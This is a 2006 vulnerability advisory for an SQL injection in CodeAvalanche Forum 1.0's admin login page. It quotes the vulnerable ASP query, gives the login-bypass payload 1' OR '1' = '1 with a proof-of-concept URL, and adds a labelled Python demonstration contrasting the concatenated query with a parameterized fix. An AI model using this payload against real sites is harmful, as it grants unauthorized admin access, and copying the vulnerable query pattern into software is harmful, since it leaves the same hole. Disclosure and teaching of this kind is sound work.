CA Forum Remote SQL Injection



------------------------------------------------------------------
- CAForum 1.0 Remote SQL Injection -
-= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

-= CodeAvalanche Forum Version 1.0 =-



Omnipresent
June 01, 2006


Vulnerability(s):
----------------
SQL Injection



Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is an ASP forum application that allows free posting; visitors do not need to register.
The administrator can add an unlimited number of forum categories.


Vulnerability / Exploit:
------------------------

The file default.asp in the Admin directory is vulnerable to a remote SQL injection attack.
An attacker can gain admin rights by supplying a crafted value in the Password parameter of the login form.

Let's check the source code of admin/default.asp:

<% Response.Buffer = True


userLogged=false
If Request("Password")<>"" Then
'response.Write(Request("Password"))
'response.flush

dim rsUser,selectSQL
' The request value is concatenated straight into the SQL text; no escaping, no parameter binding.
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]

As you can see, the Password value is not sanitized or parameterized before it is used in the query, so an attacker can
submit this string in the password field:


1' OR '1' = '1

The query string then becomes:

SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'

The appended OR '1' = '1' condition is always true, so the query returns every row of PARAMS and the login check
succeeds without knowing any password, giving access to the application with admin rights. Note that Request("Password")
without a collection name searches QueryString, Form, Cookies and the other Request collections in turn, which is why the
payload can be delivered in the URL as well as in the POSTed form.
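The following is an added example and is not part of the original advisory or of CodeAvalanche's code: it re-implements
the login query from default.asp in Python over an in-memory SQLite database so the bypass can be run offline, next to a
parameterized version of the same query. The PARAMS table layout (an ID column) and the stored password value are
constructed stand-ins, since the advisory shows only the PASSWORD column; the real application uses ADO against its own
database, but the string-building logic is identical.

```python
import sqlite3

# Constructed stand-in for the PARAMS table queried by admin/default.asp.
# The advisory shows only the PASSWORD column; the ID column and the
# stored password value here are assumptions for the example.
ADMIN_PASSWORD = "s3cret-admin-pw"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PARAMS (ID INTEGER PRIMARY KEY, PASSWORD TEXT)")
    conn.execute("INSERT INTO PARAMS (PASSWORD) VALUES (?)", (ADMIN_PASSWORD,))
    conn.commit()
    return conn


def build_vulnerable_query(password):
    """Exactly what selectSQL in default.asp evaluates to: the request
    value is concatenated into the SQL text without escaping."""
    return "SELECT * FROM PARAMS where PASSWORD='" + password + "'"


def login_vulnerable(conn, password):
    """Vulnerable check: userLogged becomes true whenever the query
    returns at least one row, which the OR '1' = '1' tail guarantees."""
    rows = conn.execute(build_vulnerable_query(password)).fetchall()
    return len(rows) > 0


def login_fixed(conn, password):
    """Hardened check: the value is bound as a parameter, so quotes in it
    are data rather than SQL, and only an exact match returns a row.
    Requiring exactly one row also rejects any query that over-matches."""
    rows = conn.execute(
        "SELECT * FROM PARAMS where PASSWORD = ?", (password,)
    ).fetchall()
    return len(rows) == 1


PAYLOAD = "1' OR '1' = '1"  # the string from the advisory


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD))
    print("vulnerable + payload :", login_vulnerable(db, PAYLOAD))
    print("vulnerable + wrong pw:", login_vulnerable(db, "wrong"))
    print("fixed + payload      :", login_fixed(db, PAYLOAD))
    print("fixed + real pw      :", login_fixed(db, ADMIN_PASSWORD))
```

In classic ASP the equivalent fix is to run the query through an ADODB.Command whose value is supplied via
CreateParameter / Parameters.Append instead of string concatenation. Doubling single quotes with
Replace(Request("Password"), "'", "''") would stop this particular payload, but binding the value is the robust fix
and also removes the error-on-lone-quote behaviour that makes the injection easy to spot.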


PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1


Vendor Status
-------------

The vendor has not been notified.

Credits:
--------
omnipresent
omnipresent@xxxxxxxx


